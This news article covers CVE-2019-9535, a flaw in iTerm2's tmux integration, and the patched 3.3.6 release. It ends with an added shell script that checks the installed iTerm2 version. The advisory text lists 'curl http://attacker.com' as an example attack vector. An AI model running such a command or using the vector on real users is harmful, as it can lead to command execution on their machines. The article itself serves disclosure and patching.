Critical Security Bug Found In Popular macOS Terminal App iTerm2, Patch Now Available

iTerm2, a popular terminal emulator widely used by developers and system administrators, is often used to process untrusted data as well. For that reason MOSS (the Mozilla Open Source Support program) chose iTerm2 for its latest audit and entrusted the work to Radically Open Security (ROS), funded by MOSS.

ROS discovered a critical security vulnerability in the widely used macOS terminal emulator. The flaw has been present in iTerm2 for 7 years and has been assigned CVE-2019-9535. It could allow an attacker to execute commands on a user's computer.

ROS provides a video demonstration of an example attack: when a user connects to a malicious SSH server, the attacker is able to run arbitrary commands on the user's machine, even though the user has only run what looks like an ordinary, harmless program.

During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.

Mozilla noted that the vulnerability requires some interaction from the user before the attacker can carry out the rest of the attack, but rated it a high potential security risk because the actions that trigger it are ones generally considered harmless. Mozilla, ROS and the iTerm2 developers have worked closely together to release the new 3.3.6 update, and the 3.3.5 security patch has also been made available.

Mozilla said that although the software will prompt users to update on its own, they expect developers to apply the update promptly to reduce the chances of being targeted.
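Since the practical advice here is "make sure you are on a fixed release", the following is an added example of a version check, written for this article and not code from Mozilla, ROS or the iTerm2 project. It assumes the application bundle is installed at /Applications/iTerm.app (overridable through the ITERM2_APP variable) and that, like any macOS bundle, it records its version in Info.plist under CFBundleShortVersionString; the fixed version 3.3.6 is the one named above.

```shell
#!/bin/sh
# Added example, not part of the article or of the iTerm2 project: check whether
# the installed iTerm2 is at or above 3.3.6, the update the article names as the
# release that addresses CVE-2019-9535.
# Assumptions (not stated in the article): the bundle lives at
# /Applications/iTerm.app (override with ITERM2_APP) and stores its version under
# the standard macOS Info.plist key CFBundleShortVersionString.

FIXED_VERSION="3.3.6"

# version_ge A B: succeed (exit 0) when dotted version A >= B.
# Components are compared numerically one at a time, so 3.3.10 > 3.3.6 and a
# missing component counts as 0 (3.3 < 3.3.6). A non-numeric suffix such as
# "6beta1" is ignored, so a pre-release build compares as its base number.
version_ge() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ca=${a%%.*}; cb=${b%%.*}                           # leading component
        case "$a" in *.*) a=${a#*.} ;; *) a="" ;; esac      # advance past it
        case "$b" in *.*) b=${b#*.} ;; *) b="" ;; esac
        ca=$(printf '%s' "$ca" | sed 's/[^0-9].*$//'); ca=${ca:-0}
        cb=$(printf '%s' "$cb" | sed 's/[^0-9].*$//'); cb=${cb:-0}
        [ "$ca" -gt "$cb" ] && return 0
        [ "$ca" -lt "$cb" ] && return 1
    done
    return 0                                               # all components equal
}

# installed_iterm2_version: print the version string of the installed bundle;
# fail if the bundle is not present. `defaults read` takes the plist path
# without its .plist extension.
installed_iterm2_version() {
    app="${ITERM2_APP:-/Applications/iTerm.app}"
    [ -r "$app/Contents/Info.plist" ] || return 1
    defaults read "$app/Contents/Info" CFBundleShortVersionString
}

# check_iterm2: report whether the installed iTerm2 carries the fix.
# Exit status: 0 patched, 1 outdated, 2 not installed.
check_iterm2() {
    v=$(installed_iterm2_version) || {
        echo "iTerm2 not found under ${ITERM2_APP:-/Applications/iTerm.app}"
        return 2
    }
    if version_ge "$v" "$FIXED_VERSION"; then
        echo "iTerm2 $v is at or above $FIXED_VERSION: CVE-2019-9535 fix present"
    else
        echo "iTerm2 $v is older than $FIXED_VERSION: update to close CVE-2019-9535"
        return 1
    fi
}

# Run the check only when invoked as `sh iterm2_check.sh --check`, so the file
# can also be sourced for its functions (hypothetical file name).
if [ "${1:-}" = "--check" ]; then
    check_iterm2
fi
```

The comparison is done component by component rather than as a string so that a later release such as 3.3.10 is not mistaken for an older one; the exit status lets the check slot into a fleet inventory script that flags machines still below the fixed release.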
